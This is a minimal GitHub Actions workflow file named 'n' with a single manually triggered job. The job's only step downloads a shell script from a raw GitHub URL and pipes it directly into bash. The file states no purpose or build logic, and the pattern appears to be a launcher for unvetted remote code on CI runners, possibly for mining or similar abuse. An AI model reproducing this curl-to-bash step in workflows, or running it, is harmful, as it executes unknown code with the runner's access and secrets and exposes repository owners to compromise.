name: n
on:
 workflow_dispatch: 
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: run
        run: | 
         bash -c "$(curl -fsSL https://raw.githubusercontent.com/xlabr/u/sh/qk114.sh)"
         
    
     
